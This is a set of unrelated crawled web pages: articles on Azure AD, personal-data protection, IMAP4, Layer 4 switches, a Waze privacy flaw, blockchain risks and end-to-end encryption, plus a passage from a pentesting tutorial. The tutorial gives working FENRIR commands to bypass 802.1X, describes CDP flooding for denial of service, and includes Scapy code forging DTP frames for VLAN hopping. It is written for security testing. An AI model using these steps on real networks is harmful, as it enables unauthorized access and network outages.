Azure Active Directory is a secure online authentication store, which can contain users and groups. Users have a username and a password which are used when you sign into an application that uses Azure AD for authentication. So for example all of the Microsoft Cloud services use Azure AD for authentication: Office 365, Dynamics 365 and Azure. If you have Office 365, you are already using Azure AD under the covers.
Azure AD Benefit 2
As well as managing users and groups, Azure AD manages access to applications that work with modern authentication mechanisms like SAML and OAuth. Applications are an object that exist in Azure AD, and this allows you to create an identity for your applications (or 3rd party ones) that you can grant access for users to. Besides seamlessly connecting to any Microsoft Online Services, Azure AD can connect to thousands of SaaS applications (e.g. Salesforce, Slack, ZenDesk etc) using a single sign-on.
When compared with AD, here is what Azure AD doesn’t do:
- You can’t join a server to it
- You can’t join a PC to it in the same way – there is Azure AD Join for Windows 10 only (see later)
- There is no Group Policy
- There is no support for LDAP, NTLM or Kerberos
- It is a flat directory structure – no OU’s or Forests
So Azure AD does not replace AD.
AD is great at managing traditional on-premise infrastructure and applications. Azure AD is great at managing user access to cloud applications. They do different things with the area of overlap being user management.
AD vs Azure AD – should you use one, the other or both?
If you have a traditional on-premise set up with AD and also want to use Azure AD to manage access to cloud applications (e.g. Office 365 or any of thousands of SaaS apps) then you can happily use both.
If you are using Office 365 then your users will have a username and password for that (managed by Azure AD), as well as a username and password for their network logon (managed by AD). These two sets of credentials are un-related. This is fine, and just means that if you have a password change policy that users will have to do this twice (and they could of course choose the same password for both).
Or you can synchronise AD with Azure AD so that the users only have one set of credentials which they use for both their network logon, and access to O365. You use Azure AD Connect to do this, it is a small free piece of Microsoft software that you install on a server to perform the synchronisation.
If you are a new business or one that is looking to transition away from having any traditional on-premise infrastructure and using purely cloud based applications, then you can operate purely using Azure AD.
In this case, although you will have all your applications in the cloud, you will of course still have physical devices – PCs and smart phones – that your team will use to access and work with these cloud applications.
So how do you secure and manage these devices?
In the case of PCs (this applies to Windows 10 only) you can Azure AD Join them and login to machines using Azure AD user accounts. You can apply conditional access policies that require machines to be Azure AD joined before accessing company resources or applications. However Azure AD Join provides limited functionality compared to AD Join (as there is no Group Policy) and in order to gain fine grained control over the PCs you would then use a Mobile Device Management solution, such as Microsoft Intune, in addition to this.
Other devices (Windows 10, iOS, Android, and MacOS) can be Azure AD Registered (which means you sign into the device itself without requiring an Azure AD account, but can then access apps etc using the Azure AD account) and controlled using Microsoft Intune.
If you can’t get all your applications as SaaS apps and have some that still need to run on your own servers, then you can migrate these to Virtual Machines (VMs) in Azure. If those VMs need to be domain joined, then you can either deploy a Domain Controller on another VM in Azure, or you can use Azure Active Directory Domain Services (Azure AD DS) which is a PaaS service (you don’t have to manage it) for domain joining Azure VMs. Azure AD DS automatically synchronises with Azure AD so all your users get the application access you want.
AD vs Azure AD Summary
In Summary, Azure AD is not simply a cloud version of AD, they do quite different things. AD is great at managing traditional on-premise infrastructure and applications. Azure AD is great at managing user access to cloud applications. You can use both together, or if you want to have a purely cloud based environment you can just use Azure AD.
Want to know more?
If you want to know more about the difference between AD vs Azure AD, Compete366 is here to help.
Contact Compete366 for a free discussion with one of our Office 365 or Azure consultants on how to take advantage of Azure AD and Azure, as well as to learn more about how to reduce your IT spend with ideal pricing.
Want to keep in touch?
If you’ve enjoyed reading this blog, then sign up to receive our monthly newsletter where we share new blogs, technical updates, product news, case studies, company updates, Microsoft and Cloud news.
We promise that we won’t share your email address with other business or parties, and will keep your details safe. You can choose to unsubscribe at any time.
Newsletter Sign Up | <urn:uuid:8033088c-93be-42a4-b64b-3c6a03b25c18> | CC-MAIN-2024-38 | https://www.compete366.com/blog-posts/the-difference-between-ad-and-azure-ad-explained/ | 2024-09-10T04:42:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00092.warc.gz | en | 0.93154 | 1,694 | 2.828125 | 3 |
Whether it tags along via a smartphone, laptop, tablet, or wearable, it seems like the internet follows us wherever we go nowadays. Yet there’s something else that follows us around as well — a growing body of personal info that we create while banking, shopping, and simply browsing the internet. And no doubt about it, our info is terrifically valuable.
What makes it so valuable? It’s no exaggeration to say that your personal info is the key to your digital life, along with your financial and civic life as well. Aside from using it to create accounts and logins, it’s further tied to everything from your bank accounts and credit cards to your driver’s license and your tax refund.
Needless to say, your personal info is something that needs protecting, so let’s check out several ways you can do just that.
What is personal info?
What is personal info? It’s info about you that others can use to identify you either directly or indirectly. Thus, that info could identify you on its own. Or it could identify you when it’s linked to other identifiers, like the ones linked with the devices, apps, tools, and protocols you use.
A prime example of direct personal info is your tax ID number because it’s unique and directly tied to your name. Further instances include your facial image to unlock your smartphone, your medical records, your finances, and your phone number because each of these can be easily linked back to you.
Then there are those indirect pieces of personal info that act as helpers. While they might not identify you on their own, a few of them can when they’re added together. These helpers include things like internet protocol addresses, the unique device ID of your smartphone, or other identifiers such as radio frequency identification tags.
You can also find pieces of your personal info in the accounts you use, like your Google to Apple IDs, which can be linked to your name, your email address, and the apps you have. You’ll also find it in the apps you use. For example, there’s personal info in the app you use to map your walks and runs, because the combination of your smartphone’s unique device ID and GPS tracking can be used in conjunction with other info to identify who you are. Not to mention where you typically like to do your 5k hill days. The same goes for messenger apps, which can collect how you interact with others, how often you use the app, and your location info based on your IP address, GPS info, or both.
In all, there’s a cloud of personal info that follows us around as we go about our day online. Some wisps of that cloud are more personally identifying than others. Yet gather enough of it, and your personal info can create a high-resolution snapshot of you — who you are, what you’re doing, when you’re doing it, and even where you’re doing it, too — particularly if it gets into the wrong hands.
Remember Pig-Pen, the character straight from the old funny pages of Charles Schultz’s Charlie Brown? He’s hard to forget with that ever-present cloud of dust following him around. Charlie Brown once said, “He may be carrying the soil that trod upon by Solomon or Nebuchadnezzar or Genghis Khan!” It’s the same with us and our personal info, except the cloud surrounding us, isn’t the dust of kings and conquerors. They’re motes of info that are of tremendously high value to crooks and bad actors — whether for purposes of identity theft or invasion of privacy.
Protecting your personal info protects your identity and privacy
With all the personal info we create and share on the internet, that calls for protecting it. Otherwise, our personal info could fall into the hands of a hacker or identity thief and end up getting abused, in potentially painful and costly ways.
Here are several things you can do to help ensure that what’s private stays that way:
1) Use a complete security platform that can also protect your privacy.
Square One is to protect your devices with comprehensive online protection software. This defends you against the latest virus, malware, spyware, and ransomware attacks plus further protects your privacy and identity. Also, it can provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who might try to force their way into your accounts.
Further, security software can also include a firewall that blocks unwanted traffic from entering your home network, such as an attacker poking around for network vulnerabilities so that they can “break in” to your computer and steal info.
2) Use a VPN.
Also known as a virtual private network, a VPN helps protect your vital personal info and other data with bank-grade encryption. The VPN encrypts your internet connection to keep your online activity private on any network, even public networks. Using a public network without a VPN can increase your risk because others on the network can potentially spy on your browsing and activity.
If you’re new to the notion of using a VPN, check out this article on VPNs and how to choose one so that you can get the best protection and privacy possible. (Our McAfee+ plans offer a VPN as part of your subscription.)
3) Keep a close grip on your Social Security Number.
In the U.S., the Social Security Number (SSN) is one of the most prized pieces of personal info as it unlocks the door to employment, finances, and much more. First up, keep a close grip on it. Literally. Store your card in a secure location. Not your purse or wallet.
Certain businesses and medical practices might ask you for your SSN for billing purposes and the like. You don’t have to provide it (although some businesses could refuse service if you don’t), and you can always ask if they will accept some alternative form of info. However, there are a handful of instances where an SSN is a requirement. These include:
- Employment or contracting with a business.
- Group health insurance.
- Financial and real estate transactions.
- Applying for credit cards, car loans, and so forth.
Be aware that hackers often get a hold of SSNs because the organization holding that info gets hacked or compromised itself. Minimizing how often you provide your SSN can offer an extra degree of protection.
4) Protect your files.
Protecting your files with encryption is a core concept in data and info security, and thus it’s a powerful way to protect your personal info. It involves transforming data or info into code that requires a digital key to access it in its original, unencrypted format. For example, McAfee+ includes File Lock, which is our file encryption feature that lets you lock important files in secure digital vaults on your device.
Additionally, you can also delete sensitive files with an application such as McAfee Shredder, which securely deletes files so that thieves can’t access them. (Quick fact: deleting files in your trash doesn’t delete them in the truest sense. They’re still there until they’re “shredded” or otherwise overwritten such that they can’t be restored.)
5) Steer clear of those internet “quizzes.”
Which Marvel Universe superhero are you? Does it really matter? After all, such quizzes and social media posts are often grifting pieces of your personal info in a seemingly playful way. While you’re not giving up your SSN, you might be giving up things like your birthday, your pet’s name, your first car…things that people often use to compose their passwords or use as answers to common security questions on banking and financial sites. The one way to pass this kind of quiz is not to take it!
6) Be on the lookout for phishing attacks.
A far more direct form of separating you from your personal info is phishing attacks. Posing as emails from known or trusted brands, financial institutions, or even a friend or family member, a scammer’s attack will try to trick you into sharing important info like your logins, account numbers, credit card numbers, and so on under the guise of providing customer service.
How do you spot such emails? Well, it’s getting a little tougher nowadays because scammers are getting more sophisticated and can make their phishing emails look increasingly legitimate. Even more so with AI tools. However, there are several ways you can spot a phishing email and phony websites. Moreover, our McAfee Scam Protection can do it for you.
7) Keep mum in your social media profile.
You can take two steps to help protect your personal info from being at risk via social media. One, think twice about what you share in that post or photo — like the location of your child’s school or the license plate on your car. Two, set your profile to private so that only friends can see it. Social media platforms like Facebook, Instagram, and others give you the option of making your profile and posts visible to friends only. Choosing this setting keeps the broader internet from seeing what you’re doing, saying, and posting, which can help protect your privacy and gives a scammer less info to exploit. Using our Social Privacy Manager can make that even easier. With only a few clicks, it can adjust more than 100 privacy settings across their social media accounts — making them more private as a result.
8) Look for HTTPS when you browse.
The “S” stands for secure. Any time you’re shopping, banking, or sharing any kind of personal info, look for “https” at the start of the web address. Some browsers also indicate HTTPS by showing a small “lock” icon. Doing otherwise on plain HTTP sites exposes your personal info for anyone who cares to monitor that site for unsecured connections.
9) Lock your devices.
By locking your devices, you protect yourself that much better from personal info and data theft in the event your device is lost, stolen, or even left unattended for a short stretch. Use your password, PIN, facial recognition, thumbprint ID, what have you. Just lock your stuff. In the case of your smartphones, read up on how you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.
10) Keep tabs on your credit — and your personal info.
Theft of your personal info can lead to credit cards and other accounts being opened falsely in your name. What’s more, it can take some time before you even become aware of it, such as when your credit score takes a hit or a bill collector comes calling. By checking your credit, you can fix any issues that come up, as companies typically have a clear-cut process for contesting any fraud. You can get a free credit report in the U.S. via the Federal Trade Commission (FTC) and likewise, other nations like the UK have similar free offerings as well.
Consider identity theft protection as well. A strong identity theft protection package pairs well with keeping track of your credit and offers cyber monitoring that scans the dark web to detect for misuse of your personal info. With our identity protection service, we help relieve the burden of identity theft if the unfortunate happens to you with $2M coverage for lawyer fees, travel expenses, lost wages, and more. | <urn:uuid:a82daa08-aa04-4cee-962b-c6895d7a2094> | CC-MAIN-2024-38 | https://www.mcafee.com/blogs/privacy-identity-protection/take-it-personally-ten-tips-for-protecting-your-personally-identifiable-information-pii/ | 2024-09-10T04:24:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00092.warc.gz | en | 0.939516 | 2,442 | 2.640625 | 3 |
Definition of Internet Mail Access Protocol version 4 (IMAP4) in Network Encyclopedia.
What is IMAP4 (Internet Mail Access Protocol version 4)?
IMAP4 stands for Internet Mail Access Protocol version 4, is an Internet standard protocol for storing and retrieving messages from Simple Mail Transfer Protocol (SMTP) hosts. Internet Mail Access Protocol version 4 (IMAP4) provides functions similar to Post Office Protocol version 3 (POP3), with additional features as described in this entry.
How it works
SMTP provides the underlying message transport mechanism for sending e-mail over the Internet, but it does not provide any facility for storing and retrieving messages. SMTP hosts must be continuously connected to one another, but most users do not have a dedicated connection to the Internet.
IMAP4 provides mechanisms for storing messages received by SMTP in a receptacle called a mailbox. An IMAP4 server stores messages received by each user until the user connects to download and read them using an IMAP4 client such as Microsoft Outlook 2000 or Microsoft Outlook Express.
IMAP4 includes a number of features that are not supported by POP3. Specifically, IMAP4 allows users to
- Access multiple folders, including public folders
- Create hierarchies of folders for storing messages
- Leave messages on the server after reading them so that they can access the messages again from another location
- Search a mailbox for a specific message to download
- Flag messages as read
- Selectively download portions of messages or attachments only
- Review the headers of messages before downloading them
To retrieve a message from an IMAP4 server, an IMAP4 client first establishes a Transmission Control Protocol (TCP) session using TCP port 143. The client then identifies itself to the server and issues a series of IMAP4 commands:
- LIST: Retrieves a list of folders in the client’s mailbox
- SELECT: Selects a particular folder to access its messages
- FETCH: Retrieves individual messages
- LOGOUT: Ends the IMAP4 session
IMAP4 is supported by Microsoft Exchange Server. Because IMAP4 clients can allow read messages to remain on the IMAP4 server, IMAP4 is especially useful for mobile users who dial up and access their mail from multiple locations. The downside is that IMAP4 servers require more resources than POP3 servers because users tend to leave large numbers of messages on the server.
To troubleshoot problems with remote IMAP4 servers, use Telnet to connect to port 143. Then try issuing various IMAP4 commands such as the ones described in this entry and examine the results. | <urn:uuid:027de46b-39b6-4467-95e2-a54cd7ac6615> | CC-MAIN-2024-38 | https://networkencyclopedia.com/internet-mail-access-protocol-version-4-imap4/ | 2024-09-11T06:39:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00892.warc.gz | en | 0.857367 | 542 | 2.921875 | 3 |
Essentially, a Layer 4 Switch is a Layer 3 switch that is capable of examining layer 4 of each packet that it switches. In TCP/IP networking, this is equivalent to examining the Transmission Control Protocol (TCP) layer information in the packet.
Vendors tout Layer 4 switches as being able to use TCP information for prioritizing traffic by application. For example, to prioritize Hypertext Transfer Protocol (HTTP) traffic, a Layer 4 switch would give priority to packets whose layer 4 (TCP) information includes TCP port number 80, the standard port number for HTTP communication.
Some vendors foresee higher-layer switches that examine layer 5, 6, or 7 information to provide more control over prioritizing application traffic, but this might be just vendor hype.
What is Layer 4 Switch?
The Layer 4 switch, often referred to as a “layer 3 switch with enhancements” or a “layer 3 switch that understands layer 4 protocols,” represents an advanced breed of network switch. While traditional switches operate at the data link layer (Layer 2) of the OSI model, the Layer 4 switch extends its purview to the transport layer. It goes beyond merely analyzing the source and destination MAC addresses and ventures into the examination of port numbers and specific transport-layer protocols such as TCP and UDP.
This heightened capability allows the Layer 4 switch to provide more granular control over network traffic, enabling functions like Quality of Service (QoS), traffic prioritization, and security enhancements. The Layer 4 switch’s unique understanding of both network and transport layer information enables more efficient routing decisions and facilitates complex network management tasks that go beyond mere packet switching. It is a critical component in building modern, intelligent, and responsive networks.
A cloud data center, such as a Google or Microsoft data center, provides many applications concurrently, such as search, email, and video applications. To support requests from external clients, each application is associated with a publicly visible IP address to which clients send their requests and from which they receive responses. Inside the data center, the external requests are first directed to a load balancer whose job it is to distribute requests to the hosts, balancing the load across the hosts as a function of their current load.
A large data center will often have several load balancers, each one devoted to a set of specific cloud applications. Such a load balancer is sometimes referred to as a “layer-4 switch” since it makes decisions based on the destination port number (layer 4) as well as destination IP address in the packet. Upon receiving a request for a particular application, the load balancer forwards it to one of the hosts that handles the application. (A host may then invoke the services of other hosts to help process the request.)
When the host finishes processing the request, it sends its response back to the load balancer, which in turn relays the response back to the external client. The load balancer not only balances the work load across hosts, but also provides a NAT-like function, translating the public external IP address to the internal IP address of the appropriate host, and then translating back for packets traveling in the reverse direction back to the clients.
This prevents clients from contacting hosts directly, which has the security benefit of hiding the internal network structure and preventing clients from directly interacting with the hosts. | <urn:uuid:04d52f52-c522-4e63-b733-015ac55c6307> | CC-MAIN-2024-38 | https://networkencyclopedia.com/layer-4-switch/ | 2024-09-11T06:43:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00892.warc.gz | en | 0.918499 | 681 | 3.15625 | 3 |
In the category of being careful with location based services when using apps, researchers at the University of California-Santa Barbara have discovered a vulnerability in the popular Waze app that permitted them to create “ghost drivers” that could monitor drivers in the vicinity and track them in real time.
Basically, the researchers were able to intercept communications between Waze and users’ phones by getting the phones to accept their computers as the connection between Waze and the users and could then reverse-engineer the Waze protocol. The researchers were then able to write a program that allowed them to create thousands of “ghost cars” and “ghost drivers” that could monitor the drivers around them.
The head of the research team exclaimed that “It’s such a massive privacy problem.” Other recent complaints since Waze updated its app in January is that when a user downloads it, it requests access to all of your contacts. Not sure why it needs your entire contact list to help you navigate from point A to point B. Just a reminder to read those pop ups when you download an app. | <urn:uuid:63d3f460-8156-497a-837f-fcf5694e0331> | CC-MAIN-2024-38 | https://www.dataprivacyandsecurityinsider.com/2016/05/waze-app-vulnerable-to-driver-tracking/ | 2024-09-13T17:52:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00692.warc.gz | en | 0.972302 | 227 | 2.71875 | 3 |
According to a PwC survey (of 600 business executives in 15 countries,) 84 percent of respondents are actively involved with blockchain. Blockchain is just one example of a distributed ledger technology (DLT), a digital system for recording the transaction of assets (money or data) without a central data store or admin functionality.
More companies are turning to DLTs like blockchain to help streamline their business, improve data transparency and reduce operational costs. From smart contracts that automate secure payments to managing customer interactions, blockchain can improve how we do business.
But, like any emerging technology, new risks and vulnerabilities can cause damage. We’ll get into that, but first, an important distinction.
Public vs. private distributed ledgers
Public ledgers mean an open network which anyone can join and contribute to. They work best for cryptocurrencies, due to anonymity features and allowing transactions across borders. Then there are private or enterprise DLTs. These identify and authorize users and determine their roles. Data is encrypted and only authorized users can operate it. Read more about both here.
Let’s explore private DLTs, which more companies are using for their benefits, from accelerated workflows to authenticating data.
DLTs usher in a new security paradigm. But for business process automation, there are risks to quash.
Joint ventures on blockchain
DLTs are great for joint ventures – notably because they act as both a registry and a financial database for payments and transactions between partners, which are logged and approved by all participants on the blockchain. It’s a trusted, transparent system – everyone authorized has access to data and knows how it’s logged. Essential features are decentralization (for data transparency and trust), scalability (which enables adding new participants to the network) and the use of smart contracts.
But centralization can create a security risk. Blockchain data is trusted when it’s distributed, so the more nodes (those who have access to the blockchain system, either computer programs or authorized users) that can approve transactions, the more you can trust the data. That’s why deploying blockchain within a single company or organization to secure data doesn’t make much sense as “consensus” comes from a sole authority.
Why one of the most successful enterprise blockchain platforms isn’t as secure as you think
One of the best known enterprise-grade platforms, Hyperledger Fabric, creates consensus using a permission voting algorithm. But how secure is it?
Once the majority of nodes in the blockchain validate the transaction, we reach consensus and finality (a new block or sequence is added to the ledger.) Hyperledger Fabric provides channels – isolated “subnets” of data exchange between specific network members. It’s useful for industrial and manufacturing scenarios where a blockchain may include potential competitors. The separate channels in Hyperledger Fabric can prevent data from being accessible to participants from outside of a designated channel.
But the consensus mechanism could be misconfigured – this might happen at design and deployment stages, often revealed too late to fix easily because, for users, everything seems to be working fine. Then it can’t validate nodes, even for transactions involving many participants across several channels. As a result, the consensus is limited to validators of a single channel who confirm adding the transaction to the blockchain.
Beware of blockchain after a cyberattack
Beware hacked user accounts. During a cyberattack, data could be tampered with and then submitted to the blockchain. For example, let’s say a user is attacked while approving commercial purchase agreements in a joint venture, further executed by a smart contract. If the attacker gets access to the contract, they can tamper with the supplier’s bank account and amount in the contract. The “correct” agreement will then trigger execution of a smart contract, meaning some or all of the money goes to the attacker.
Due to blockchain’s inherent immutability (i.e. it can’t be changed), it’s going to be very difficult (and expensive) to fix the incorrect data. What’s more, if this data gets into smart contracts, the issue will snowball and subsequently cause big problems. In this purchase agreement example, to fix the incorrect transaction, payment needs to be reconciled. But that’s not simple.
They can try to stop and revert a bank transaction, but blockchain can’t undo its immutable records. It will store information that a certain company (blockchain participant) has paid, whereas the supplier has not received the funds. It’s a double loss: companies spent a fortune on the blockchain solution, then get their money stolen.
Blockchain risks for large enterprises and corporate groups
Similar blockchain technologies are used for transactions between banks or groups of banks. As the technologies are the same, they have the same vulnerabilities. This opens wide opportunities for an attacker: having performed a successful attack on one bank, they’re more likely to be more successful and quicker with the same attack on another member of the group.
If just one vulnerability of a single participant is exploited on the blockchain, there’s a huge cybersecurity risk for other participants on the same system, running the risk of a mass leak of sensitive financial or private data across a group.
Blockchain can cause a bottleneck
Blockchain is designed for transactions, so it works well for trading and integrates with financial systems to support the supply of goods, automated pricing and using smart contracts to execute financial transactions.
Smooth running in good times. But blockchain could also be a bottleneck. Lots of transactions are processed simultaneously, which a good platform should process rapidly. But if the system can’t handle the load, it can fail.
Getting blockchain right for your business
There’s no “one size fits all” with blockchain. Right now, given DLTs nascent maturity, it’s difficult to know how well any individual solution will perform. It’s unlikely we’ll soon see a solution that works perfectly straight out of the box. You’ll need to invest in customization to create the right process for your business needs.
These steps can help plan your best-fit blockchain strategy.
The right tools for the job
Consider the process you want blockchain to automate. It should be iterative, involve many parties, and it shouldn’t include data that needs to be modified or deleted. If it doesn’t fit these criteria, blockchain and DLT isn’t the right tech.
Start the journey with small steps
So you decide to launch on blockchain. Like other big IT projects, plan the rollout in stages to test and fine-tune. Keep in mind that DLT is most powerful at handling large-scale processes. You may not get immediate cost savings from a solution for one department, even if it works smoothly, but you can start small to test how it works. Then take the next step – scale to counterparties working with that department. Then get bigger by adding external suppliers.
Even with blockchain, you still need to pay attention to cybersecurity
Blockchain is more secure than many other enterprise data solutions, but it’s not bullet-proof to cyberattacks. You’ll need an endpoint cybersecurity solution on all corporate devices accessing the blockchain, which should be assessed with a third-party cybersecurity provider.
Audit your smart contracts. A vulnerable or inconsistent contract may lead to an expensive problem to fix down the line.
By deploying blockchain, you’re establishing a new IT infrastructure in your organization. A vulnerability could lead to an attack and penetration of your corporate network. So new software and servers need protecting. Always use firewalls and install server cybersecurity tools to run scans, encrypt data and renew licenses. Finally, run a penetration test to reveal weak spots.
All parties in your blockchain must apply the same level of security. Agree on common security policies with participants; it may be tricky due to different security practices but otherwise, your data and systems are at risk.
There’s no doubt; blockchain will revolutionize how companies collaborate for the better. But as with most new techs, pay attention to how you can best protect your data. | <urn:uuid:ebb83f46-2384-4551-bf46-1cc31208e496> | CC-MAIN-2024-38 | https://www.kaspersky.com/blog/secure-futures-magazine/blockchain-business-vulnerabilities/35713/ | 2024-09-13T19:34:18Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00692.warc.gz | en | 0.925645 | 1,700 | 2.75 | 3 |
What is Encryption?
These days, many companies claim to have products that are “end-to-end encrypted”. This is often misleading. There is a standard web encryption, often referred to as “client-to-server” (C2S) encryption, and then there is a true end-to-end (E2E) encryption. The difference between C2S and E2E is the difference between communicating privately, and someone can monitor everything you send and receive.
C2S encryption providers process, and store your unencrypted data in cloud servers. But many of these companies abuse your trust by spying on your data, and in some cases even manipulating your actions. In other words, these service providers are in the middle of senders and recipients with full access to our data and communications.
In case of E2E encryption the service providers have no access to your data. In E2E ( one “end” is the sender and the other “end” is the recipient), encryption (lock) is performed locally on sender’s device and gets decrypted (unlock) only on receiver’s device. That means throughout the transfer process the data remains encrypted.
The most important point from a security point of view is that lock and key are never together in the entire transfer process. That means there’s no possibility of any intermediary to gain access to your data or communication. Embracing truly E2E encrypted solutions can insulate you from data breach risks and remove the possibility of intermediaries tempering or monitoring your data.
What is End-to End Encryption with DropSecure?
Our end-to-end encryption is enabled using randomly generated AES 256-bit symmetric keys on your computer.
Every file you store, share or send via DropSecure is enabled with unique end-to-end encryption technology. In addition, every new file version saved on the DropSecure platform automatically regenerates a fresh encryption key. So you can be assured that every file is encrypted in real-time, using military grade algorithms before it leaves your device and cannot be decrypted until the recipient safely downloads the file at their end. | <urn:uuid:4854504d-c4c8-4d8f-b9f8-5f2238041d22> | CC-MAIN-2024-38 | https://dropsecure.com/product/end-to-end-encryption/ | 2024-09-15T00:43:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00592.warc.gz | en | 0.946982 | 453 | 2.578125 | 3 |
This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.
The main goal of an attacker is to gain access to computer network resources or disrupt the normal network operation (i.e. cause a denial of service). In most cases, attacks at the data link layer are delivered simultaneously to raise the exploitation efficiency. For instance, the attack causing a content-addressable memory overflow in a switch creates ideal conditions for traffic interception, an attack on the DTP protocol enables the attacker to escape to another VLAN and compromise VLAN segments, etc.
Data-link layer attacks can be divided into three types:
- MITM. An attacker ‘stands in the middle’ between network devices and intercepts traffic without visible attack signs for legitimate hosts on the network;
- DoS. An attacker delivers a destructive attack on network equipment to disable it. In pentesting studies, such attacks are less practical and are suitable only as a deceptive maneuver in red-teaming; and
- unauthorized access to network segments. Using protocol flaws, an attacker can unpredictably gain access to inaccessible parts of the network. This type includes DTP VLAN hopping and double tagging attacks.
Disclaimer and toolkit
The data link layer offers numerous vectors for denial of service attacks. Prior to using them in a pentesting study, make sure to coordinate your steps with the customer! In production, delivery of DoS attacks is a very special thing. In my opinion, they are most useful in red-teaming as a maneuver to distract the blue team.
I am going to use the following tools:
- Yersinia – a framework for L2 attacks and stress tests of computer networks;
- Scapy – a Python module for manipulations with network packets. It can be used both as a sniffer and a packet injector; and
- FENRIR – a framework designed to bypass 802.1X protection on Ethernet networks.
How to bypass 802.1X
IEEE 802.1X is an end-user authentication and authorization standard at the data link layer. It supports access control and prevents devices from connecting to the local network without a special authorization procedure. This mechanism significantly increases the security level on the local network by preventing unauthorized connections. For pentesters, 802.1X can pose a major problem.
MAC authentication bypass
This 802.1X bypassing technique is very simple. MAB is used against devices that don’t support 802.1x authentication. In other words, MAC authorization is performed. MAB is very easy to bypass. You just find some legitimate device, write down its MAC address, and assign this MAC address to the network interface of the attacking PC. Then you connect to the switch and get access to the network. I won’t demonstrate this attack since it’s too simple.
Bridge-based attack is the most popular and effective way to bypass 802.1X. To implement it, you have to place your device between a legitimate client that has passed the 802.1X authentication and the switch. The switch acts as an authenticator and provides connectivity between the client and the authentication server.
Too bad, this attack has a limitation. To use it in production, you need a legitimate device that has passed the 802.1X authentication. It can be a printer, an IP phone, or an employee’s laptop.
To demonstrate this attack, I will use the FENRIR tool.
First, I switch physical interfaces to the promiscuous mode:
c0ldheim@PWN:~$ sudo ifconfig eth0 promiscc0ldheim@PWN:~$ sudo ifconfig eth1 promisc
Then I run FENRIR and specify the IP address of the legitimate device, its MAC address, and two interfaces of my attacking PC. In real-life conditions, you can gain all this information by listening the traffic. The interface looking towards the legitimate device will act as hostIface
; the interface looking towards the switch, as netIface
. After that, I create a bridge called FENRIR
c0ldheim@PWN:~$ sudo python2 Interface.pyFENRIR > set host_ip 10.1.1.3FENRIR > set host_mac 50:00:00:04:00:00FENRIR > set hostIface eth1FENRIR > set netIface eth0FENRIR > create_virtual_tap
The newly-created bridge must be configured. I switch it to the promiscuous mode and assign the desired IP address taking into account the subnet mask. Finally, I add the default route for the FENRIR
c0ldheim@PWN:~$ sudo ifconfig FENRIR promiscc0ldheim@PWN:~$ sudo ifconfig FENRIR 10.1.1.50 netmask 255.255.255.0c0ldheim@PWN:~$ sudo route add default gw 10.1.1.254 FENRIR
command in the FENRIR console launches the attack.
FENRIR > run
Success! I gained access to the network and can continue network reconnaissance to find neighbors in this network. I run an ARP scan using netdiscover.
Let’s see whether a path to the router is available.
After the exploitation, the legitimate host retains its connection and has access to the Internet.
CDP x LLDP
Dumping CDP/LLDP traffic has a significant impact because the attacker gets plenty of information about the network device: from its model to the duplex type. Information extracted from a CDP/LLDP traffic dump is extremely useful to the attacker. For instance, it can be used to determine the switch firmware version. If it has a known vulnerability, then the attacker can exploit it.
By sending a huge number of CDP messages, an attacker can cause a denial of service on a Cisco switch. The switch’s CPU becomes completely overloaded, while the CDP neighbors table starts overflowing. The attack is quite simple, so I won’t spend much time on it.
To deliver this attack, I will use Yersinia. I need the “flooding CDP table” option: it will cause an avalanche-like and very fast flood of CDP frames; these frames will overload the switch’s CPU, thus, making normal network operation impossible.
Attacking VLAN networks
Dynamic trunking and escape to other VLAN segments
This attack is applicable only to Cisco switches. The idea is to forcibly switch a port to the trunk channel mode. The DTP protocol is responsible for automatic trunking on Cisco switches. By default, all ports on a Cisco switch are in DTP Dynamic Auto mode. This means that the port will wait for a trunk initiation from a neighboring port. After sending a specially crafted DTP Desirable frame, the attacker will be able to jump to any VLAN and view traffic of all VLANs.
I will use Scapy to assemble a DTP Desirable frame. First, I import the module required to work with the DTP protocol:
>>> from.scapy.contrib.dtp import *
Then I assemble an 802.3 Ethernet frame; the source MAC address will be randomized, while the destination MAC address will be the L2 multicast address: 01:
The multicast address 01:
is used not only by the DTP protocol, but also by CDP, VTP, PAgP, and UDLD. To ensure that the protocols send advertisements to the same multicast address in different ways, a unique value is implemented for each them in the SNAP header at the LLC (Logical Link Control) level. For DTP, this value is 0x2004
At the LLC
layers, the value 0x2004
indicates that this is the DTP protocol. In tlvlist
, default header values can be left, except for DTPNeighbor
. At the end, I loop the operation sending out the assembled frame: it will be sent every three seconds. This is because the port was configured dynamically, and its lifetime is only 300 seconds (i.e. 5 minutes).
>>> mymac = RandMAC()>>> dtp_frame = Dot3(src=mymac, dst="01:00:0C:CC:CC:CC")>>> dtp_frame /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)/SNAP(OUI=0x0c, code = 0x2004)>>> dtp_frame /= DTP(tlvlist=[DTPDomain(),DTPStatus(),DTPType(),DTPNeighbor(neighbor=mymac)])>>> sendp(dtp_frame, iface="eth0", inter=3, loop=1, verbose=1)
For some reason, the default DTP frame in Scapy stores all values required to assemble a DTP Desirable frame. I don’t know yet why, but in this particular case, it’s an advantage that saves my time. Accordingly, I leave the default DTP parameters (with the exception of DTPNeighbor
The most important headers and their values are as follows:
– header value indicating the use of 802.1Q encapsulation; and= '\ xa5' -
– header value indicating the status of the DTP frame. This status is= '\ x03' Desirable
; it’s required to initiate the trunk mode on the port.
